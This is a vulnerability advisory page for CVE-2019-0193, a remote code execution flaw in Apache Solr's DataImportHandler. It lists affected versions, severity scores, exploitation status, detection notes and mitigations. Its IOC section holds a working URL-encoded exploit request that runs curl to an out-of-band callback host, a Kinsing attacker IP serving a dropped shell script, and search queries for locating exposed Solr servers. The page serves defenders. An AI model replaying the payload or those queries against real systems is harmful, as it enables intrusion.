cbcvebase.
CVE-2019-0193
published 2019-08-01

CVE-2019-0193: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH…

PriorityP185high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-06-10
Exploited in the wild
EPSS
83.55%
99.6th percentile
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.

Affected

6 ranges
VendorProductVersion rangeFixed in
apacheapache_solr
apachesolr< 7.7.37.7.3
apachesolr>= 8.1.0 < 8.1.28.1.2
debiandebian_linux
debiandebian_linux
debianlucene-solr< lucene-solr 3.6.2+dfsg-22 (bookworm)lucene-solr 3.6.2+dfsg-22 (bookworm)

Detection & IOCsextracted from sources · hover to see the quote

url/solr/admin/cores?wt=json
url/solr/{{core}}/dataimport?indent=on&wt=json
commandcommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
ip194.87.252.159
  • Exploit POST requests target the /solr/<core>/dataimport endpoint with Content-Type: application/x-www-form-urlencoded and the X-Requested-With: XMLHttpRequest header; the body contains debug=true and a dataConfig parameter embedding a <script> block with Java Runtime.exec() calls.
  • Exploitation is confirmed by an outbound HTTP interaction (e.g., curl callback) originating from the Solr Java process; monitor for unexpected outbound HTTP/DNS from the Solr JVM process.
  • Shodan/FOFA queries can identify exposed Solr instances: search for http.title:"apache solr", http.title:"solr admin", title="solr admin", or intitle:"apache solr" to find potentially vulnerable targets.
  • In post-exploitation (Kinsing campaign), the attacker's initial runtime command was executed under the Java process of Apache Solr; alert on child process spawning (e.g., curl, sh, wget) from the Solr JVM.
  • Kinsing post-exploitation drops a shell script to /tmp/zzz fetched from 194.87.252[.]159; monitor for curl/wget writing to /tmp with subsequent execution.
  • ·The vulnerability is only exploitable when the DIH module is enabled and the dataConfig request parameter is accepted; starting with Solr 8.2.0, the Java System property 'enable.dih.dataConfigParam' must be explicitly set to true for the parameter to be accepted.
  • ·As a mitigation short of patching, solrconfig.xml can be edited to configure all DataImportHandler usages with an 'invariants' section listing the 'dataConfig' parameter set to an empty string, or network controls can restrict access to the DataImportHandler endpoint.
  • ·The Nuclei template uses an OAST/interactsh callback to confirm exploitation; passive/blind detection requires an out-of-band interaction channel and will not fire on network-isolated Solr instances.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
osv7.2HIGH
vulncheck7.2HIGH
cisa7.2HIGH
vendor_debian7.2LOW
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.